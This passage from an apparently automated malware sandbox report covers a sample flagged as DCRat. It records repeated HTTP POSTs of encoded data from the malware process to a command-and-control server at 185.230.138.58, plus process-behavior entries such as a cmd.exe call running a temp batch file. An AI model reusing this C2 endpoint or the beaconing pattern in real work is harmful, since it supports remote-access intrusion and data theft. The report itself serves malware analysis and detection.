                                                                                                                                        Dec 21, 2024 10:10:26.588247061 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:26.821270943 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:26 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        140192.168.2.450149185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:27.073102951 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:10:27.421498060 CET1012OUTData Raw: 57 54 5a 5b 5f 47 51 50 5b 59 51 56 59 5e 58 5b 56 59 5d 5d 5a 5d 5b 45 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WTZ[_GQP[YQVY^X[VY]]Z][E[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!,/ ,71<6==1 ),<';5?_ 3>(X$7-'*'^& X/8
                                                                                                                                        Dec 21, 2024 10:10:28.671343088 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:28.905266047 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:28 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        141192.168.2.450150185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:29.154234886 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:29.500844955 CET1012OUTData Raw: 52 57 5f 5e 5a 40 54 56 5b 59 51 56 59 53 58 51 56 5a 5d 5a 5a 5a 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RW_^Z@TV[YQVYSXQVZ]ZZZ[C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!A8; /4&<&*[2 .**/4[1;5+:,0'*3'^& X/
                                                                                                                                        Dec 21, 2024 10:10:30.398605108 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:30.633328915 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:30 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        142192.168.2.450151185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:30.885894060 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:31.233916044 CET1012OUTData Raw: 57 54 5f 50 5f 46 54 56 5b 59 51 56 59 5e 58 59 56 5f 5d 58 5a 5e 5b 42 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WT_P_FTV[YQVY^XYV_]XZ^[B[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!G;1$Y#< %/&^=)#.)+/Z2(]<,$0X&$%':'^& X/8


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        143192.168.2.450152185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:31.823893070 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:32.171351910 CET1892OUTData Raw: 57 50 5a 5f 5a 45 51 55 5b 59 51 56 59 53 58 5f 56 5c 5d 59 5a 50 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WPZ_ZEQU[YQVYSX_V\]YZP[C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!,2 < %,>_=-%7*)$]&\+$3=,_$Q*]$:'^& X/
                                                                                                                                        Dec 21, 2024 10:10:33.073298931 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:33.309542894 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:32 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 26 04 21 26 2b 57 26 04 2c 0d 33 3e 08 12 2b 2e 37 5a 24 3c 3e 1d 23 33 34 5c 2a 11 30 01 25 3d 29 05 27 2f 2f 0e 3c 56 37 11 3a 1a 20 46 04 1c 20 07 28 0d 22 1a 3e 01 2b 06 2f 06 36 03 28 22 2d 06 21 02 21 10 37 3e 3e 5a 34 1f 26 0d 28 2a 31 0f 29 24 38 5f 3a 07 2d 04 36 3a 23 56 0b 1f 3a 0a 2b 23 2d 00 27 37 27 00 26 51 21 0d 20 35 33 19 22 31 23 13 36 3e 37 5c 32 06 08 59 35 2b 24 53 3e 01 22 58 25 5f 23 0e 3a 17 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98&!&+W&,3>+.7Z$<>#34\*0%=)'//<V7: F (">+/6("-!!7>>Z4&(*1)$8_:-6:#V:+#-'7'&Q! 53"1#6>7\2Y5+$S>"X%_#:&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        144192.168.2.450153185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:31.949347973 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1008
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:32.296297073 CET1008OUTData Raw: 52 53 5a 58 5f 48 54 56 5b 59 51 56 59 5a 58 50 56 5c 5d 5c 5a 5f 5b 47 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RSZX_HTV[YQVYZXPV\]\Z_[G[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C,T \!/+Z16_*"W75*,$286?_33,^$)$'^& X/
                                                                                                                                        Dec 21, 2024 10:10:33.207031012 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:33.445369959 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:33 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        145192.168.2.450154185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:33.696851969 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:10:34.048870087 CET1012OUTData Raw: 57 56 5f 51 5a 47 51 57 5b 59 51 56 59 5d 58 50 56 5e 5d 5b 5a 5e 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WV_QZGQW[YQVY]XPV^][Z^[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX";3#/[&Z:Z(-#>*/]2(&+*+'?3!''^& X/
                                                                                                                                        Dec 21, 2024 10:10:34.941710949 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:35.177434921 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:34 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        146192.168.2.450155185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:35.417078972 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:35.768981934 CET1012OUTData Raw: 57 57 5a 5c 5a 42 51 5e 5b 59 51 56 59 5c 58 5d 56 59 5d 5c 5a 5f 5b 42 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WWZ\ZBQ^[YQVY\X]VY]\Z_[B[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!F8^4#X$<=(=9 5+?&(5?_7T$'$3'^& X/0
                                                                                                                                        Dec 21, 2024 10:10:36.665487051 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:36.897546053 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:36 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        147192.168.2.450156185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:37.136925936 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:37.484890938 CET1012OUTData Raw: 52 55 5f 5b 5f 42 51 54 5b 59 51 56 59 5b 58 5c 56 59 5d 58 5a 5e 5b 44 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RU_[_BQT[YQVY[X\VY]XZ^[D[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!/" <;Y%<=6U#>"Z>'&8%()+0$Q6X''^& X/,
                                                                                                                                        Dec 21, 2024 10:10:38.384809971 CET25INHTTP/1.1 100 Continue


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        148192.168.2.450157185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:38.448887110 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:38.796400070 CET1892OUTData Raw: 52 52 5f 5f 5f 46 51 51 5b 59 51 56 59 5d 58 5b 56 58 5d 5b 5a 5c 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RR___FQQ[YQVY]X[VX][Z\[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX",! !<?[%Z:)-"-&^+?&(*(943>$^&$"Y''^& X/
                                                                                                                                        Dec 21, 2024 10:10:39.693727016 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:39.929838896 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:39 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 25 5d 21 25 23 57 26 13 37 1e 33 58 26 59 2b 07 27 17 33 2c 2d 43 22 23 12 5e 2a 11 38 05 25 2e 25 00 24 2f 27 0d 2b 23 2f 5c 2d 30 20 46 04 1c 20 01 3f 20 2a 14 2a 5e 2f 05 38 28 35 5a 2b 1c 3a 14 35 02 0f 58 37 10 2e 17 20 1f 35 52 3c 17 32 56 29 1a 24 12 39 58 26 10 21 10 23 56 0b 1f 39 1d 2b 23 22 5a 27 0e 37 04 26 51 21 0e 23 40 33 52 22 31 23 1e 22 13 27 5d 32 28 03 02 22 38 27 0c 3d 2f 32 58 25 17 2c 50 2c 3d 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98%]!%#W&73X&Y+'3,-C"#^*8%.%$/'+#/\-0 F ? **^/8(5Z+:5X7. 5R<2V)$9X&!#V9+#"Z'7&Q!#@3R"1#"']2("8'=/2X%,P,=&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        149192.168.2.450158185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:38.572237015 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1000
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:38.921370983 CET1000OUTData Raw: 57 51 5a 5a 5f 49 51 5e 5b 59 51 56 59 5a 58 58 56 5f 5d 5c 5a 5f 5b 40 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WQZZ_IQ^[YQVYZXXV_]\Z_[@[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!G8,Y4<(&,6*=9">Z*<7'()[)*?'> &7-3'^& X/<
                                                                                                                                        Dec 21, 2024 10:10:39.816725016 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:40.049680948 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:39 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Statistics

                                                                                                                                        CPU Usage

                                                                                                                                        Click to jump to process

                                                                                                                                        Memory Usage

                                                                                                                                        Click to jump to process

                                                                                                                                        High Level Behavior Distribution

                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                        Behavior

                                                                                                                                        Click to jump to process

                                                                                                                                        System Behavior

                                                                                                                                        General

                                                                                                                                        Target ID:0
                                                                                                                                        Start time:04:07:03
                                                                                                                                        Start date:21/12/2024
                                                                                                                                        Path:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Users\user\Desktop\3e88PGFfkf.exe"
                                                                                                                                        Imagebase:0xf50000
                                                                                                                                        File size:4'897'280 bytes
                                                                                                                                        MD5 hash:99209E1F30A833E0C7654FCC0AA2C9C5
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000000.1698323315.0000000000F52000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:1
                                                                                                                                        Start time:04:07:06
                                                                                                                                        Start date:21/12/2024
                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aWMGkikz2Q.bat"
                                                                                                                                        Imagebase:0x7ff763ae0000
                                                                                                                                        File size:289'792 bytes
                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:2
                                                                                                                                        Start time:04:07:06
                                                                                                                                        Start date:21/12/2024
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                        File size:862'208 bytes
                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:3
                                                                                                                                        Start time:04:07:06
                                                                                                                                        Start date:21/12/2024
                                                                                                                                        Path:C:\Windows\System32\chcp.com
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:chcp 65001
                                                                                                                                        Imagebase:0x7ff72ea40000
                                                                                                                                        File size:14'848 bytes
                                                                                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:4
                                                                                                                                        Start time:04:07:06
